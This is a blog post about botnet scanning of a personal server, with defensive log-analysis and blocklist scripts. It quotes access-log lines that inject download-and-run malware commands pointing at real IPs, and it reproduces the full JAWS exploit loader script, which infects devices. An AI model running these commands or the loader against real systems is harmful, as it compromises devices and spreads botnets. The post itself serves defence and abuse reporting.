date: 2024-04-02 07:57:18
categories: default
firstPublishDate: 2023-06-24 18:07:35
My server runs a web server and an SSH server. There is nothing on the web server and no link on the internet points to it, yet it is scanned constantly: every device connected to the internet gets scanned.
To reduce this scanning, set up a firewall:
Related news:
Which routers? Cisco and Netgear:
Normally nobody would connect to port 80, since there are no links and no content, but there are lots of connections anyway.
The web server gets these types of accesses:
```
GET /.env HTTP/1.1
GET /shell?cd+/tmp;rm+-rf+*;wget+45.81.243.34/jaws;sh+/tmp/jaws HTTP/1.1
GET /shell?cd+/tmp;rm+-rf+*;wget+204.44.109.117/jaws;sh+/tmp/jaws HTTP/1.1
GET /proxychecker/index.php HTTP/1.1
GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0
HEAD /wordpress HTTP/1.1
POST /boaform/admin/formLogin HTTP/1.1
GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://114.225.221.114:56637/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
GET /echo.php HTTP/1.1
GET /admin/db.sql HTTP/1.1
CONNECT HTTP/1.1
GET /?Z70166322662Q1 HTTP/1.1
GET /MyAdmin/scripts/setup.php HTTP/1.0
GET /phpMyAdmin-2.11.1.2/scripts/setup.php HTTP/1.0
GET /phpmyadmin/scripts/setup.php HTTP/1.0
GET /php/scripts/setup.php HTTP/1.0
GET /mysqladmin/scripts/setup.php HTTP/1.0
GET /phpMyAdmin/scripts/setup.php HTTP/1.0
GET /_phpMyAdmin/scripts/setup.php HTTP/1.0
GET /phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.0
GET /dbadmin/scripts/setup.php HTTP/1.0
GET /mysqlmanager/scripts/setup.php HTTP/1.0
GET /sqlweb/scripts/setup.php HTTP/1.0
GET /webadmin/scripts/setup.php HTTP/1.0
GET /phpmanager/scripts/setup.php HTTP/1.0
GET /phpMyAdmin-2.11.3/scripts/setup.php HTTP/1.0
GET /phpMyAdmin-2/scripts/setup.php HTTP/1.0
GET /db/scripts/setup.php HTTP/1.0
GET /admin/phpmyadmin/scripts/setup.txt HTTP/1.0
GET /mysql/scripts/setup.php HTTP/1.0
GET /phpMyAdmin-2.5.5/scripts/setup.php HTTP/1.0
GET /phpMyAdmin-2.11.7/scripts/setup.php HTTP/1.0
GET /admin/pma/scripts/setup.php HTTP/1.0
GET /myadmin/scripts/setup.php HTTP/1.0
GET /PHPMYADMIN/scripts/setup.php HTTP/1.0
GET /pma/scripts/setup.php HTTP/1.0
GET /mysql-admin/scripts/setup.php HTTP/1.0
GET /phpMyAdmin-2.11.0/scripts/setup.php HTTP/1.0
GET /phpMyAdmin-2.11.9.2/scripts/setup.php HTTP/1.0
GET /phpMyAdmin-2.5.5-pl1/scripts/setup.php HTTP/1.0
GET /phpMyAdmin-2.10.2/scripts/setup.php HTTP/1.0
GET /websql/scripts/setup.php HTTP/1.0
GET /sqlmanager/scripts/setup.php HTTP/1.0
GET /phpma/scripts/setup.php HTTP/1.0
GET /phpMyAdmin3/scripts/setup.php HTTP/1.0
GET /phpMyAdmin-2.10.3/scripts/setup.php HTTP/1.0
GET /admin/scripts/setup.php HTTP/1.0
GET /phpMyAdmin-2.8.0.2/scripts/setup.php HTTP/1.0
GET /phpMyAdmin2/scripts/setup.php HTTP/1.0
GET /web/phpMyAdmin/scripts/setup.php HTTP/1.0
GET /php-myadmin/scripts/setup.php HTTP/1.0
GET /phpmy-admin/scripts/setup.php HTTP/1.0
GET /phpMyAdmin-2.5.4/scripts/setup.php HTTP/1.0
GET /webdb/scripts/setup.php HTTP/1.0
GET /phpMyAdmin-2.5.7-pl1/scripts/setup.php HTTP/1.0
GET /SQL/scripts/setup.php HTTP/1.0
POST /mgmt/tm/util/bash HTTP/1.1
GET /.git/HEAD HTTP/1.1
GET /nmaplowercheck1680223056 HTTP/1.1
GET /System/configurationFile?auth=YWRtaW46MTEK HTTP/1.1
```
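As an added example (my code, not the author's), here is a small Python triage script for request lines of the kind listed above. It decodes the query string the way the scanners write it (`+` for space), flags shell metacharacters as command injection, pulls out the IP address the injected command downloads its payload from (the host you would report or block), and labels the common probe paths. The sample requests are copied from the list above plus one benign request for contrast; the class labels are my own names, and `f5-icontrol-probe` is my label for `/mgmt/tm/util/bash`, which is the bash utility endpoint of F5 BIG-IP's iControl REST API.

```python
import re
from urllib.parse import unquote, unquote_plus, urlsplit

# Constructed sample: six request lines from the list above plus one benign
# request.  These are the inputs the functions below are exercised on.
SAMPLE_REQUESTS = [
    "GET /.env HTTP/1.1",
    "GET /shell?cd+/tmp;rm+-rf+*;wget+45.81.243.34/jaws;sh+/tmp/jaws HTTP/1.1",
    "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://114.225.221.114:56637/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0",
    "GET /phpMyAdmin-2.11.1.2/scripts/setup.php HTTP/1.0",
    "GET /nmaplowercheck1680223056 HTTP/1.1",
    "POST /mgmt/tm/util/bash HTTP/1.1",
    "GET /index.html HTTP/1.1",
]

REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+) (?P<target>\S+) HTTP/(?P<version>\d\.\d)$")

# Shell metacharacters have no business in the query string of a static site.
SHELL_META = re.compile(r"[;|`]|\$\(|&&")

# First downloader command in a shell statement and the IPv4 host it fetches from.
DOWNLOADER = re.compile(
    r"\b(?:wget|curl|tftp)\b[^;|&]*?(?P<ip>\d{1,3}(?:\.\d{1,3}){3})(?::(?P<port>\d+))?"
)

# Path signatures for the scanner families in the list above.  The labels are
# my own names for this example, not something the page or a vendor defines.
PATH_SIGNATURES = [
    ("phpmyadmin-setup-probe", re.compile(r"/scripts/setup\.(?:php|txt)$")),
    ("secrets-probe",          re.compile(r"^/\.(?:env|git/)")),
    ("router-login-probe",     re.compile(r"^/boaform/admin/formLogin")),
    ("f5-icontrol-probe",      re.compile(r"^/mgmt/tm/util/bash")),
    ("nmap-http-probe",        re.compile(r"^/nmaplowercheck\d+$")),
]


def classify(request_line):
    """Return {'class': ..., 'path': ..., 'loader': ip-or-None} for one request line."""
    m = REQUEST_LINE.match(request_line.strip())
    if not m:
        return {"class": "malformed", "path": None, "loader": None}
    parts = urlsplit(m.group("target"))
    path = unquote(parts.path)
    # '+' means space in application/x-www-form-urlencoded, which is how the
    # injected shell commands above are written, so decode the query with unquote_plus.
    query = unquote_plus(parts.query)
    result = {"class": "other", "path": path, "loader": None}
    if SHELL_META.search(query):
        result["class"] = "command-injection"
        dl = DOWNLOADER.search(query)
        if dl:
            result["loader"] = dl.group("ip")
        return result
    for label, pattern in PATH_SIGNATURES:
        if pattern.search(path):
            result["class"] = label
            return result
    return result


def triage(lines):
    """Classify every line and drop the ones that look benign."""
    return [r for r in (classify(line) for line in lines) if r["class"] != "other"]


def loader_hosts(lines):
    """Distinct IPv4 hosts the injected commands try to download malware from."""
    return sorted({r["loader"] for r in triage(lines) if r["loader"]})


if __name__ == "__main__":
    for r in triage(SAMPLE_REQUESTS):
        print(f"{r['class']:24} {r['path']}  loader={r['loader']}")
    print("loader hosts:", loader_hosts(SAMPLE_REQUESTS))
```

Feed it the request column of the access log; the loader hosts are the addresses worth an abuse report, since they serve the malware, while the requesting IP is usually just an infected device.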
These requests come from:
data centers: 'security research' at companies and universities, VPSes running malicious software, VPSes created and destroyed after a few hours (only the SSH port is open; these machines only scan), game servers...
ISPs: compromised computers and internet devices: routers, internet-connected cameras, self-hosters...
mobile phone operators: mobile phones running malware
To get some information about a source IP, enter the IP in the GreyNoise service:
There is also the AbuseIPDB service:
Some of the tools used to scan the machines are:
anonymous botnets
[https://en.wikipedia.org/wiki/Botnet](Botnet article on Wikipedia)
Some of the 'security research' companies are:
internet-census.org: ip 185.180.143.72 as211680 anubisnetworks.com
shodan.io: ip 198.20.69.98 census2.shodan.io as32475 singlehop.com, ip 185.142.236.41 guitar.census.shodan.io as174 cogentco.com
These companies map the internet and sell the data to other companies.
The 'security research' labs leave a message with contact information, and one can opt out of the scan:
IP: 38.110.46.2
Hello, This is a research scanning machine from the Georgia Institute of Technology. This machine regularly conducts scans of the entire Internet so you may have been scanned as part of an ongoing research project. If you have been or are currently being scanned and would like to opt out, please email scp-network-measurement@cc.gatech.edu with the name or address of the scanner, and the IP ranges you would like to exclude in CIDR format and we will respond immediately.
Scanning back the source IPs, I found devices like:
a DVR from
running malware.
a MikroTik router running RouterOS 6.34.2 (released in 2016).
a Cisco router
machines running OpenVPN CWS on a web server.
I found a service selling access to proxy servers:
When the source IP belongs to a mobile operator, the device is behind CGNAT and unreachable; in general the IP is that of a Cisco router.
The source IPs are located all over the world. On some days most of the scans were coming from Brazilian mobile phone networks and ISPs; I think people there are running an app containing malware... Some scans happen during daytime at the source IP's location, so the malicious software runs on devices that people turn on and off.
To reduce the number of scans, I have been blocking ASNs. The first blocked ASNs were the big clouds: Amazon, Azure, Google, DigitalOcean, Vultr, OVH, ... because those clouds do a lot of scanning from many IPs.
Over the course of 2 months, the scans have come from about 1400 ASNs; these ASNs route 1.3 billion IPv4 addresses.
[gemini://gmi.noulin.net/asns.txt](ASNs with devices scanning my server)
There are VPSes on DigitalOcean distributing malware; I reported the abuse and DigitalOcean terminated the user account.
Report abuse at: [https://www.digitalocean.com/company/contact/#abuse](DigitalOcean Abuse)
For all my abuse reports, I get this reply:
```
Subject: New Intrusion/Exploit Abuse Form Submission

Hello,

Thank you for the report. We have notified the appropriate customers. We appreciate your efforts in helping to clean up the internet!

Regards,
Security Operations Center
DigitalOcean
```
In a darknet forum, I saw this:
alternatives to digital ocean? was trying to set up a cpanel and scampage for spamming but digital ocean keeps banning my accounts when i create them and i have a good set up and using my own bank drop cards to open.... 1984hosting or buyvm net good alternatives? what difference will i need to do one these sites compared to creating a droplet like on digital ocean to start my cpanel?
AWS, Microsoft and Google also have abuse report pages:
[https://aws.amazon.com/forms/report-abuse](AWS abuse)
[https://msrc.microsoft.com/report/abuse](Microsoft abuse)
[https://support.google.com/code/contact/cloud_platform_report?hl=en](Google abuse)
The web server gets a lot of requests like this one: `/shell?cd+/tmp;rm+-rf+*;wget+45.81.243.34/jaws;sh+/tmp/jaws`. I searched for the program generating these requests and found a version of the script that tries to upload jaws: [https://github.com/R00tS3c/DDOS-RootSec/blob/master/Botnets/Exploits/JAWS/jaws_loader.py](Jaws loader github)
```python
#Jaws Exploit Loader
# Python 2 script as published: one process per target, each trying the ARM7
# and ARM4 payload names in turn against the JAWS /shell endpoint.
import random, socket, time, sys, requests, re, os
from multiprocessing import Process

if len(sys.argv) < 2:
    sys.exit("usage: python %s <input list> <port>" % (sys.argv[0]))

bin_names = ["ARM7", "ARM4"]
list = open(sys.argv[1], "r").readlines()
port = sys.argv[2]

def send_payload(target):
    for names in bin_names:
        print "[JAWS/1.0] attempting to infect %s with bin %s" % (target, names)
        # The whole shell command goes in the query string, exactly as seen in the
        # access log above; wget is tried first, tftp as a fallback.
        url = "http://" + target + ":" + port + "/shell?cd /tmp; echo >NiGGeR || cd /var; echo >NiGGeR; cp /bin/busybox yeet; >yeet; chmod 777 yeet; nohup wget http:/\/209.66.128.162:80/%s -O yeet || nohup tftp -r %s -g 209.66.128.162 -l yeet; chmod 777 yeet;./yeet; rm -rf yeeter >/dev/null 2>&1" % (names, names)
        try:
            output = requests.get(url, timeout=3)
            # Any HTTP 200 is taken as success and the target is logged as infected.
            if output.status_code == int('200'):
                print "[JAWS/1.0] infected %s" % (target)
                file_h = open("jaws_infected.txt", "a+")
                file_h.write(target + "\n")
                file_h.close()
                break
        except:
            pass

for i in open(sys.argv[1]).readlines():
    try:
        i = i.strip("\r\n")
        t = Process(target=send_payload, args=(i,))
        t.start()
    except KeyboardInterrupt:
        os.kill(os.getpid(), 9)
    except:
        pass
```
Some machines are running a version of the Mirai botnet; on port 1024 I got:
```
Welcome to the Yugi v4 Mirai Variant!
```
Scanning one of these machines with nmap:
```
# scan the machines with nmap:
nmap -sS -O 109.205.213.41
Starting Nmap 7.80 ( https://nmap.org ) at 2023-04-10 07:16 +02
Nmap scan report for 109.205.213.41
Host is up (0.094s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
1024/tcp open  kdm
3306/tcp open  mysql
Device type: general purpose
Running: Linux 4.X
OS CPE: cpe:/o:linux:linux_kernel:4.4
OS details: Linux 4.4
Network Distance: 19 hops
```
WIRED wrote an article about the creators of the Mirai botnet:
The SSH service is the most scanned; the botnets scanning SSH are more widespread than the ones scanning web servers. These scans come from the same types of networks (data centers, ISPs, mobile networks) and from more geographical locations. I use rate limiters (fail2ban and sshguard) and I still get 3 login attempts per minute from 200 IPs a day, from these types of machines:
Linux Servers
Android devices
Android devices are the majority of the devices scanning the SSH service, whether they are connected to Wi-Fi or to mobile networks. I haven't found any information about which apps run these botnets.
Maybe there is some information on github: [https://github.com/topics/android-botnet](Android botnet topic on github)
The botnets use the root username most of the time and also try many other usernames; some of them are:
```
.log 123!@# 159casia@yhy357 Cmadaas@2019 NetAdmin Wanglei00 a adam adfexc adm admin admin1234 alan an appldev aqswdefr bds black bpsolutions build byzoro cactiuser cluster com cvs debian deployer dev didichan dmdba dpoint dreambox elk es flw ftp_user ftpadmin gandalf graphic greenplum guest hadoop hhm huawei hxhtftp hxhttp hyper information inspur invoice jboss jenkins jhj jiangyue john jtx9d321 jysong kafka lafe lenovo liuyichen lixiaoke localhost lsfadmin lsh lxc maowd matt minecraft myapn_cen nadmin nagios njzt nmsuser now5 nvidia odoo openpose oracle oracletest osboxes ossuser owa prabha prueba ps qlli qwy robertlu root rzchi secadd share shiluj shop shopdb steam student suahn21 subzero swsong tao test test1 test2 thl tiago tiankong314 tippy tomcat tve ubuntu ubuntu1 uftp usearch user user0 user01 user5 vbox vps web webadmin webapp wocloud wsm wuhz wwwlog xiangliyao yskwon yuelv za zhangby zhangyi zhasen zhouxy zone zxcasd
```
There are mobile phones with botnets preinstalled: [https://www.techspot.com/news/98667-millions-android-phones-come-pre-installed-malware-there.html](Preinstalled botnets on android phones)
I want to be able to monitor the connections from my Android phone. I found the NetGuard app, which works as a firewall but creates a VPN that drains the battery. It would be better to have access to nftables and iptables, since Android runs Linux.
There is a service that gives the email address for reporting abuse from an IP address:
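An added example, not from the post: the same kind of counting done over sshd log lines in Python. The log lines are constructed (RFC 5737 documentation addresses) in the shape OpenSSH writes to auth.log; they are not lines from the author's server. `bursty_sources` applies the decision fail2ban expresses with maxretry and findtime, set here to the "3 attempts per minute" figure quoted above, and `usernames_tried` produces a username frequency table like the list above.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sample auth.log lines (documentation-range IPs), in the shape
# OpenSSH writes them.  Not lines from the author's server.
SAMPLE_AUTH_LOG = """\
Apr  2 07:57:18 gmi sshd[4120]: Failed password for root from 203.0.113.5 port 51234 ssh2
Apr  2 07:57:19 gmi sshd[4120]: Failed password for root from 203.0.113.5 port 51234 ssh2
Apr  2 07:57:21 gmi sshd[4120]: Failed password for root from 203.0.113.5 port 51234 ssh2
Apr  2 07:57:22 gmi sshd[4121]: Invalid user admin from 198.51.100.7 port 40022
Apr  2 07:57:22 gmi sshd[4121]: Failed password for invalid user admin from 198.51.100.7 port 40022 ssh2
Apr  2 07:58:40 gmi sshd[4130]: Failed password for invalid user oracle from 198.51.100.7 port 40031 ssh2
Apr  2 08:03:02 gmi sshd[4142]: Failed password for invalid user hadoop from 192.0.2.9 port 2222 ssh2
Apr  2 08:10:15 gmi sshd[4150]: Accepted publickey for leo from 192.0.2.200 port 50000 ssh2
"""

# Only "Failed password" lines are counted: the "Invalid user" line that
# precedes one of them refers to the same attempt and would double count it.
FAILED = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?P<invalid>invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)


def parse_failures(text):
    """Return [(timestamp, username, source_ip, user_exists)] for each failed login."""
    out = []
    for line in text.splitlines():
        m = FAILED.match(line)
        if not m:
            continue
        # syslog timestamps carry no year; strptime defaults to 1900, which is
        # fine for measuring the gaps between attempts within one day.
        ts = datetime.strptime(re.sub(r"\s+", " ", m.group("ts")), "%b %d %H:%M:%S")
        out.append((ts, m.group("user"), m.group("ip"), m.group("invalid") is None))
    return out


def usernames_tried(text):
    """How often each username was tried; root dominates, as the post observes."""
    return Counter(user for _, user, _, _ in parse_failures(text))


def attempts_per_source(text):
    """Failed attempts per source IP."""
    return Counter(ip for _, _, ip, _ in parse_failures(text))


def bursty_sources(text, max_attempts=3, window_seconds=60):
    """Source IPs with >= max_attempts failures inside any window_seconds span.

    Same rule fail2ban applies with maxretry/findtime; the defaults mirror the
    '3 attempts per minute' rate the post quotes."""
    times = defaultdict(list)
    for ts, _, ip, _ in parse_failures(text):
        times[ip].append(ts)
    window = timedelta(seconds=window_seconds)
    flagged = []
    for ip, stamps in times.items():
        stamps.sort()
        # Slide a window of max_attempts consecutive failures over the sorted times.
        for i in range(len(stamps) - max_attempts + 1):
            if stamps[i + max_attempts - 1] - stamps[i] <= window:
                flagged.append(ip)
                break
    return sorted(flagged)


if __name__ == "__main__":
    print("attempts per source:", dict(attempts_per_source(SAMPLE_AUTH_LOG)))
    print("usernames tried:    ", usernames_tried(SAMPLE_AUTH_LOG).most_common())
    print("ban candidates:     ", bursty_sources(SAMPLE_AUTH_LOG))
```

The `user_exists` flag separates guesses at real accounts (root) from dictionary names; on a key-only server every "Failed password" line is noise, but a burst against an account that exists is the one worth looking at.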
Most of the time, I don't get a reply to my abuse report.
I got this reply from MVPS.net:
```
Thank you for the notification. We've suspended the service.

Kind Regards,
MVPS.net Abuse
```
I sent an abuse email to JPNIC; I thought it was the ISP because the domain is `nic.ad.jp` and I got the email address from abuse.net. JPNIC replied telling me to use whois:
```
whois -h whois.nic.ad.jp 210.149.68.157/e
[ JPNIC database provides information regarding IP address and ASN. Its use ]
[ is restricted to network administration purposes. For further information, ]
[ use 'whois -h whois.nic.ad.jp help'. To only display English output, ]
[ add '/e' at the end of command, e.g. 'whois -h whois.nic.ad.jp xxx/e'. ]

Network Information:
a. [Network Number]             210.149.68.0/24
b. [Network Name]               T-CLOUD-2
g. [Organization]               Thomas of America
m. [Administrative Contact]     AS30773JP
n. [Technical Contact]          AS30773JP
o. [Abuse]
p. [Nameserver]                 ns1.raservers.net
p. [Nameserver]                 ns2.raservers.net
[Assigned Date]                 2020/10/07
[Return Date]
[Last Update]                   2020/12/21 13:17:03(JST)

Less Specific Info.
----------
Internet Initiative Japan Inc.
                  [Allocation]           210.149.0.0/16

More Specific Info.
----------
No match!!
```
The contact information is `AS30773JP`. It looks like an ASN but is a JPNIC contact handle (the `o. [Abuse]` field above is empty), so I queried JPNIC for it:
```
whois -h whois.nic.ad.jp ^AS30773JP
[ JPNIC database provides information regarding IP address and ASN. Its use ]
[ is restricted to network administration purposes. For further information, ]
[ use 'whois -h whois.nic.ad.jp help'. To only display English output, ]
[ add '/e' at the end of command, e.g. 'whois -h whois.nic.ad.jp xxx/e'. ]

Contact Information:
a. [JPNIC Handle]               AS30773JP
c. [Last, First]                Sogi, Akiyuki
d. [E-Mail]                     support@1strentalserver.com
g. [Organization]               Thomas of America
l. [Division]                   Hosting devision
n. [Title]
o. [TEL]
p. [FAX]
y. [Reply Mail]                 apply@iij.ad.jp
[Last Update]                   2020/10/05 10:53:03(JST)
                                db-staff@nic.ad.jp
```
I suppose the abuse email address is the one on the `d.` line.
The addresses of the RIR whois databases (plus JPNIC, the Japanese national registry under APNIC) are:
```
APNIC WHOIS   (whois.apnic.net)
ARIN WHOIS    (whois.arin.net)
AfriNIC WHOIS (whois.afrinic.net)
JPNIC WHOIS   (whois.nic.ad.jp)
LACNIC WHOIS  (whois.lacnic.net)
RIPE WHOIS    (whois.ripe.net)
```
With whois, I sometimes get the abuse email directly:
```
whois -h whois.apnic.net 203.114.102.173
% [whois.apnic.net]
% Whois data copyright terms    http://www.apnic.net/db/dbcopyright.html

% Information related to '203.114.96.0 - 203.114.127.255'

% Abuse contact for '203.114.96.0 - 203.114.127.255' is 'abuse@totisp.net'

inetnum:        203.114.96.0 - 203.114.127.255
netname:        TOTNET-AP
descr:          TOT public company limited
descr:          Telecommunication Provider, Network Service Provider (NSP)
descr:          Internet Service Provider (ISP) in Thailand
country:        TH
org:            ORG-TPCL1-AP
admin-c:        pa82-ap
tech-c:         tk56-ap
tech-c:         SS110-AP
abuse-c:        AT950-AP
status:         ALLOCATED PORTABLE
remarks:        ------------------------------------------------
remarks:        This object can only be modified by APNIC hostmaster
remarks:        If you wish to modify this object details please
remarks:        send email to hostmaster@apnic.net with your organisation
remarks:        account name in the subject line.
remarks:        ------------------------------------------------
mnt-by:         APNIC-HM
mnt-lower:      MAINT-TH-TOT
mnt-routes:     MAINT-TH-TOT
mnt-irt:        IRT-TOT-TH
last-modified:  2020-07-09T07:13:24Z
source:         APNIC
```
To list the networks belonging to an AS with whois, query RADB like this:
```
whois -h whois.radb.net -- '-i origin AS134166'
route:          203.114.102.0/24
descr:          CAT route object for TOT
origin:         AS134166
mnt-by:         MAINT-THIX-CAT-TH
changed:        catdb@cat.net.th 20160112
source:         RADB

route:          1.179.247.0/24
descr:          CAT route object for TOT
origin:         AS134166
mnt-by:         MAINT-THIX-CAT-TH
changed:        catdb@cat.net.th 20160125
source:         RADB
...

# LIST ipv4 NETWORKS ONLY:
whois -h whois.radb.net -- '-i origin AS134166'| grep -Eo "([0-9.]+){4}/[0-9]+"|sort -u
113.53.228.0/24
1.179.246.0/23
1.179.246.0/24
1.179.247.0/24
118.174.10.0/24
118.174.11.0/24
118.174.8.0/22
118.174.8.0/24
118.174.9.0/24
118.175.1.0/24
118.175.28.0/24
180.180.242.0/23
180.180.242.0/24
180.180.243.0/24
180.180.244.0/23
180.180.244.0/24
180.180.245.0/24
180.180.247.0/24
203.113.10.0/24
203.113.11.0/24
203.113.12.0/24
203.113.124.0/24
203.113.125.0/24
203.113.126.0/24
203.113.14.0/24
203.113.15.0/24
203.113.25.0/24
203.113.4.0/24
203.113.5.0/24
203.113.6.0/24
203.113.70.0/24
203.113.7.0/24
203.113.71.0/24
203.113.8.0/22
203.113.8.0/24
203.113.9.0/24
203.113.95.0/24
203.114.100.0/24
203.114.102.0/24
203.114.112.0/24
203.114.116.0/24
203.114.96.0/24
203.114.97.0/24
203.114.98.0/24
203.114.99.0/24
```
The list of networks I get with these queries is not accurate; some networks belong to other ASNs, so I prefer ip2location.
Every day I'm adding ASNs to the list, and now I'm getting 2 to 5 brute-force login attempts a day on the SSH service, which is low compared to where it was at the beginning.
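An added example, not from the post: turning a RADB `route:` dump for one ASN into an nftables blocklist, for the ASN blocking described earlier and the whois query just above. The input is a constructed excerpt in the RADB object format (a few of the AS134166 routes, trimmed to the attributes that matter), not a full query result. The parser reads only `route:`/`route6:` attributes instead of grepping for anything that looks like a prefix, `ipaddress.collapse_addresses` drops the /24s that a /23 or /22 already covers (the query above returns both, which the grep output shows), and `nft_ruleset` renders a set with `flags interval` that `nft -f` can load. The table and set names are my choices.

```python
import ipaddress
import re

# Constructed sample in whois.radb.net output format: a handful of the
# AS134166 route objects from the query above, reduced to a few attributes.
SAMPLE_RADB = """\
route:          203.114.102.0/24
descr:          CAT route object for TOT
origin:         AS134166
mnt-by:         MAINT-THIX-CAT-TH
source:         RADB

route:          1.179.246.0/23
origin:         AS134166
source:         RADB

route:          1.179.246.0/24
origin:         AS134166
source:         RADB

route:          1.179.247.0/24
origin:         AS134166
source:         RADB

route:          118.174.8.0/22
origin:         AS134166
source:         RADB

route:          118.174.9.0/24
origin:         AS134166
source:         RADB
"""

# Prefixes come only from route:/route6: attributes, never from free text.
ROUTE = re.compile(r"^route6?:\s*(\S+)\s*$", re.MULTILINE)


def prefixes_from_radb(text):
    """Parse route objects into ip_network values, skipping malformed ones."""
    found = set()
    for value in ROUTE.findall(text):
        try:
            found.add(ipaddress.ip_network(value, strict=True))
        except ValueError:
            continue  # host bits set or otherwise malformed; not worth a rule
    return found


def aggregate(prefixes):
    """Collapse covered and adjacent prefixes, separately per address family."""
    v4 = sorted(ipaddress.collapse_addresses([p for p in prefixes if p.version == 4]))
    v6 = sorted(ipaddress.collapse_addresses([p for p in prefixes if p.version == 6]))
    return v4, v6


def is_blocked(address, networks):
    """True if the address falls inside any of the aggregated networks."""
    addr = ipaddress.ip_address(address)
    return any(addr in net for net in networks)


def nft_ruleset(v4, table="inet filter", setname="scanner_asns"):
    """Render an nftables ruleset that drops inbound packets from the set.

    'flags interval' lets the set hold CIDR ranges; table and set names are
    this example's own choices."""
    elements = ", ".join(str(p) for p in v4)
    return (
        f"table {table} {{\n"
        f"\tset {setname} {{\n"
        f"\t\ttype ipv4_addr\n"
        f"\t\tflags interval\n"
        f"\t\telements = {{ {elements} }}\n"
        f"\t}}\n"
        f"\tchain input {{\n"
        f"\t\ttype filter hook input priority 0; policy accept;\n"
        f"\t\tip saddr @{setname} drop\n"
        f"\t}}\n"
        f"}}\n"
    )


if __name__ == "__main__":
    v4, _ = aggregate(prefixes_from_radb(SAMPLE_RADB))
    print(nft_ruleset(v4), end="")  # pipe into: nft -f -
```

Concatenate the whois output for every ASN on the list, run the script, and load the result with `nft -f -`. Because RADB route objects are maintained by the networks themselves and go stale, this set inherits the inaccuracy noted above; cross-checking the prefixes against a second source before dropping traffic from them is the safer course.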
Related article:
Hashtags: #botnet #malware #security #exploits #zombie #abuse #whois